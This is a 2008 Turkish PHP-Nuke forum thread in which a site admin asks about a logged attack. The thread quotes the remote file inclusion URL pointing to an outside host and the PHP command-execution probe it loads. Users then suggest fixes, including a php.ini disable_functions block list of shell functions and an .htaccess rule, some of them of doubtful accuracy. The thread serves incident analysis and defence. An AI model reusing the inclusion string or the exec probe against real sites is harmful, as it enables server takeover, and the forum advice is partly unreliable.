Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 628
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Nuke sentinelin sorgulama..
(4987 okuma, 0 yanıt)
 dizin CHMOD ları değişmiy..
(8245 okuma, 6 yanıt)
 3.3Patch Hakkında Versiyo..
(3478 okuma, 0 yanıt)
 nuke sentinel 2.6.01 kura..
(10182 okuma, 10 yanıt)
 Nuke Sentinel..
(4576 okuma, 2 yanıt)
 Nuke 8.0 Guvenlik..
(5118 okuma, 2 yanıt)
 Php Nuke 8.0 Güvenlik asa..
(3580 okuma, 0 yanıt)
 php nuke 8 kurdum güvenli..
(10536 okuma, 10 yanıt)
 Arkadaslar Lütfen Yardımc..
(9652 okuma, 9 yanıt)
 Site hacklendi sanırım.....
(5377 okuma, 2 yanıt)
 Hadi Protector Kuralım..
(42499 okuma, 45 yanıt)
 Bu bir saldırmı..
(8521 okuma, 7 yanıt)
 siteme virüs girmis..
(8607 okuma, 6 yanıt)
 Sitedekileri atmak..
(5460 okuma, 2 yanıt)
 Kötü botları engellemek...
(11622 okuma, 10 yanıt)
 2 dakika içinde 5 farklı ..
(7413 okuma, 5 yanıt)
 index atılamayan site yap..
(7345 okuma, 5 yanıt)
 Sanal Klavye Uygulamasi H..
(5542 okuma, 2 yanıt)
 js trojandownloader.agent..
(5946 okuma, 4 yanıt)
 Güvenlik konusunda yardım..
(7781 okuma, 8 yanıt)
 Sunucu firması websiteme ..
(5169 okuma, 2 yanıt)
 siteme saldirimi olmus?..
(6180 okuma, 4 yanıt)
 Protector bir işe yaramıy..
(14475 okuma, 15 yanıt)
 Nuke Sentinel 242 pl5 ( 7..
(27555 okuma, 25 yanıt)
 hacklendim mi?..
(6257 okuma, 4 yanıt)
 Güvenli prefix değiştirme..
(79454 okuma, 108 yanıt)
 7.6 ya 3.2 pack nasıl yap..
(4629 okuma, 1 yanıt)
 Site neden Google i banla..
(4349 okuma, 1 yanıt)
 PhpMyadminden toplu isim ..
(6477 okuma, 4 yanıt)
 sentinel güvenlik sistemi..
(7580 okuma, 6 yanıt)
 Sitemdeki Bu Acik Neyden ..
(7607 okuma, 6 yanıt)
 Saldırı yedim BW dolmuş. ..
(10284 okuma, 9 yanıt)
 sürümünüz < 7.8 ise s..
(7314 okuma, 5 yanıt)
 forum için kod yazma yasa..
(5162 okuma, 2 yanıt)
 Arkadaşlar hacklendim seb..
(4913 okuma, 2 yanıt)
 KENDİ TOLBARIMIMDAN AYDA ..
(5484 okuma, 3 yanıt)
 Bütün indexler değişmiş, ..
(4986 okuma, 3 yanıt)
 Çok sorulu, çok şıklı ank..
(3580 okuma, 0 yanıt)
 Protector' deki Host İs..
(3599 okuma, 0 yanıt)
 php nuke dosyaları şifrel..
(7851 okuma, 7 yanıt)
 index dosyasının chmod k..
(4218 okuma, 1 yanıt)
 AdminBox-1.0.3 Kurulumund..
(3776 okuma, 0 yanıt)
 gec saatlerde hızlanan tr..
(8190 okuma, 8 yanıt)
 Prefix değiştirmede coppe..
(4661 okuma, 1 yanıt)
 Nuke Güvenlik..
(165494 okuma, 257 yanıt)
 bütün index lere iframe e..
(19621 okuma, 24 yanıt)
 Nuke Sentinel Google bot ..
(5910 okuma, 4 yanıt)
 Siteme Sürekli Üye Oluyor..
(25523 okuma, 28 yanıt)
 Yeni iframe virüsler kodl..
(19814 okuma, 23 yanıt)
 Nuke Versiyonları Hakkın..
(3946 okuma, 0 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - Bu Saldırı Hakkında Bilgisi Olan varmı?
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


Bu Saldırı Hakkında Bilgisi Olan varmı?

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
polibo06
Site Yöneticisi
Site Yöneticisi





Kayıt: Nov 01, 2006
Mesajlar: 2412
Konum: izmirimi özledim

MesajTarih: 2008-03-31, 02:13:37    Mesaj konusu: Bu Saldırı Hakkında Bilgisi Olan varmı? Alıntıyla Cevap Gönder

Arkadaşlar çok ilginç bir saldırı gördüm.Bunu ilk defa gördüm ve acaba bir bilen varmıdır diye öğrenmek istedim

sistem:
libwww-perl/5.805

ip adres:
219.94.128.57


adres satırına;

index.php?phpBB_root_path=http://stmikx.freehoxt.com/Sekip/id.txt?

yazıyorlar...bu link ile ne gibi bir saldırı yapıldığını bilen varmı?
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-11-10, 19:43:06    Mesaj konusu: Forum Arası Reklamlar


Başa dön
polibo06
Site Yöneticisi
Site Yöneticisi





Kayıt: Nov 01, 2006
Mesajlar: 2412
Konum: izmirimi özledim

MesajTarih: 2008-03-31, 02:17:37    Mesaj konusu: Alıntıyla Cevap Gönder

uzak serverdaki php dosyası;

Kod:

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
komutan1905
Mesaj: 500+
Mesaj: 500+





Kayıt: Sep 26, 2005
Mesajlar: 534
Konum: istanbul

MesajTarih: 2008-03-31, 13:07:01    Mesaj konusu: Alıntıyla Cevap Gönder

bu shell denemesidir...ancak salak lamer becerememiş....
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
akinci313
Mesaj: 1+
Mesaj: 1+





Kayıt: Dec 29, 2003
Mesajlar: 44
Konum: çanakkale

MesajTarih: 2008-03-31, 13:07:23    Mesaj konusu: Re: Bu Saldırı Hakkında Bilgisi Olan varmı? Alıntıyla Cevap Gönder

Benim anladigim kadari XSS acigi üzere shell atip root hakkina ele gecirmeye calismislar.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana

MesajTarih: 2008-03-31, 14:30:37    Mesaj konusu: Alıntıyla Cevap Gönder

polibo sunucunda tehlikeli fonksiyonlar aktif onları devre dışı bırakırsan sorun yaşamazsın başta shell_exec olmak üzere
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
DiRect
Mesaj: 200+
Mesaj: 200+





Kayıt: Jun 24, 2006
Mesajlar: 210

MesajTarih: 2008-03-31, 18:12:36    Mesaj konusu: Re: Bu Saldırı Hakkında Bilgisi Olan varmı? Alıntıyla Cevap Gönder

c-99 attack olarak da geçiyo sanırım bu olay, uzak sunucudan dosya çekip sitene bırakıyorlar shell atma olarak. Sonra istedikleri gibi sitende gezebiliyorlar index atabiliyorlar.

Dosyalarını incele içlerinde herhangi göze çarpan bir kod parçacığı var mı? Belkide bırakmışlardır ve saldırıya açıktır.

Sitene shell bırakılıyorsa (bırakılmışsa) hostun fonkiyonlarından olabilir amanav arkadaşın dediği gibi. Gerekirse host firması bile değiştirilebilir.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Sercan
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 07, 2006
Mesajlar: 1719
Konum: İstanbuL //

MesajTarih: 2008-03-31, 20:31:47    Mesaj konusu: Re: Bu Saldırı Hakkında Bilgisi Olan varmı? Alıntıyla Cevap Gönder

DiRect :
c-99 attack olarak da geçiyo sanırım bu olay, uzak sunucudan dosya çekip sitene bırakıyorlar shell atma olarak. Sonra istedikleri gibi sitende gezebiliyorlar index atabiliyorlar.

Dosyalarını incele içlerinde herhangi göze çarpan bir kod parçacığı var mı? Belkide bırakmışlardır ve saldırıya açıktır.

Sitene shell bırakılıyorsa (bırakılmışsa) hostun fonkiyonlarından olabilir amanav arkadaşın dediği gibi. Gerekirse host firması bile değiştirilebilir.

c99 sadece bir siteye dediğin saldırıları yapar r57 ile serverındaki bir siteden diğer tüm sitelere ulaşabilirler.Sunucudaki güvenlik modu açıksa atak yapmaları rahatlaşır.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
serserialper21
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 02, 2006
Mesajlar: 1660
Konum: Diyarbakır

MesajTarih: 2008-03-31, 22:21:39    Mesaj konusu: Alıntıyla Cevap Gönder

bu arada belirtmek isterım ki shell ile sadece uzak sunucudan c99 scripti ile saldırmayadabılır ki sende oyle yapmıs da fakat bunun dahilinde scripti upload ederek te çalıştırabılır

Server'in safe mod'unu devre dışı bıraktırabılırsenız script çalışmayacaktır bildiğim kadarı ile...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger MSN Messenger
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-11-10, 19:43:06    Mesaj konusu: Forum Arası Reklamlar


Başa dön
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan

MesajTarih: 2008-03-31, 22:26:20    Mesaj konusu: Alıntıyla Cevap Gönder

safe mod on olsa dahi çalışan çeşitleri var bu r57 dosyalarının. açığın sebebini söyleyim size.

adres satırında
phpBB_root_path=http://stmikx.freehoxt.com/Sekip/id.txt?

yazıyor, phpbb_root_path değişkeninni tnaımlıyor, aşağıda

include($phpbb_root_path.'ayar.php');

gibi satırlar var. bu durum da diğer siteden shell içeriğini alıyor, böylece sunucunuz da değişiklik yapabilme hakkına ulaşıyor. google da shell bypass yazarsanız karşıt önlemlerini görürsünüz. kısıtlanması gereken fonksiyonlar var. peki açığı nasıl kapatırım diyorsanız, include satırından önce
$phpbb_root_path='';

eklemeniz yeterli. ben burda boş oalrak atadım, siz diğer sayfalara bakarak doğru olanını eklerseniz böyle bir sorun kalmaz
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
polibo06
Site Yöneticisi
Site Yöneticisi





Kayıt: Nov 01, 2006
Mesajlar: 2412
Konum: izmirimi özledim

MesajTarih: 2008-04-01, 13:55:04    Mesaj konusu: Alıntıyla Cevap Gönder

herkese teşekür ederim umduğumdan bile fazla bilgi vermişsiniz çok teşekürler...ilk önce bu saldırı yemedi..

serverıma güvenim sonsuzdur...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana

MesajTarih: 2008-04-01, 15:43:03    Mesaj konusu: Alıntıyla Cevap Gönder

polibo06 :
herkese teşekür ederim umduğumdan bile fazla bilgi vermişsiniz çok teşekürler...ilk önce bu saldırı yemedi..

serverıma güvenim sonsuzdur...


sunucya güvenmek farklı güvende tutmak farklıdır...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
komutan1905
Mesaj: 500+
Mesaj: 500+





Kayıt: Sep 26, 2005
Mesajlar: 534
Konum: istanbul

MesajTarih: 2008-04-01, 15:49:28    Mesaj konusu: Re: Bu Saldırı Hakkında Bilgisi Olan varmı? Alıntıyla Cevap Gönder

Bence sen aşağıdaki kodları .htaccess e ekle böylece serverine her türlü resim php kod dosyalarının girmesini engeller eğer sitende avatar dosya upload varsa çakışır...


Kod:
<Files *.js ,*.php ,*.html ,*.cgi ,*.txt>
Deny From All
</Files>
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
asilimy
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul

MesajTarih: 2008-04-06, 14:23:25    Mesaj konusu: Alıntıyla Cevap Gönder

c99 saldırısı 2 haftadır banada yapılıyor. hosting firmasına belirttim. bakalım ne olacak.. Sad
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger
ulkucudiyari
Mesaj: 200+
Mesaj: 200+





Kayıt: Apr 12, 2006
Mesajlar: 213
Konum: Trabzon

MesajTarih: 2008-07-30, 04:18:59    Mesaj konusu: Alıntıyla Cevap Gönder

rootshell denemesi uzakdan shell dosyası ile kontrol
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Just
Mesaj: 100+
Mesaj: 100+





Kayıt: Oct 29, 2006
Mesajlar: 196
Konum: Uzak Bir Yer!

MesajTarih: 2008-07-30, 12:15:28    Mesaj konusu: Alıntıyla Cevap Gönder

Root girişi yaparak

php.ini de disable_functions satırını bulun ve yanına

Kod:
glob,hopenbasedir,f_open,system,dl,passthr u,cat,exec,popen,proc_close,proc_get_status,proc_n ice,proc_open,escapeshellcmd,escapeshellarg,show_s ource,posix_mkfifo,mysql_list_dbs,get_current_user ,getmyuid,pconnect,link,symlink,pcntl_exec,ini_alt er,parse_ini_file,leak,apache_child_terminate,posi x_kill,posix_setpgid,posix_setsid,posix_setuid,pro c_terminate,syslog,fpassthru,stream_select,socket_ select,socket_create,socket_create_listen,socket_c reate_pair,socket_listen,socket_accept,socket_bind ,socket_strerror,pcntl_fork,pcntl_signal,pcntl_wai tpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsi gnaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wterm sig,openlog,apache_get_modules,apache_get_version, apache_getenv,apache_note,apache_setenv,virtual

bu komutu ekleyin. Safe mode gerekmedikçe "on" konumunda kalsın.

Very Happy
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Sınırsız Trafik Satan Hosting Varmı hidalgo27 Domain Pazarı 0 2010-07-03, 23:15:33 Son Mesajı Görüntüle
Yeni mesaj yok Musıc Box elinde olan varmı cuneytsonmez Php Nuke Modülleri 2 2010-07-01, 08:54:15 Son Mesajı Görüntüle
Yeni mesaj yok weadam host kullanan varmı? eynesilcom Linux Genel 2 2010-06-30, 04:00:18 Son Mesajı Görüntüle
Yeni mesaj yok emlak sitesi hakkında Miralay33 Php Nuke Sorunlarınız 7 2010-06-28, 14:31:26 Son Mesajı Görüntüle
Yeni mesaj yok tema hakkında yardım temhem Php Nuke Tema Paylaşımları 5 2010-06-24, 21:34:21 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright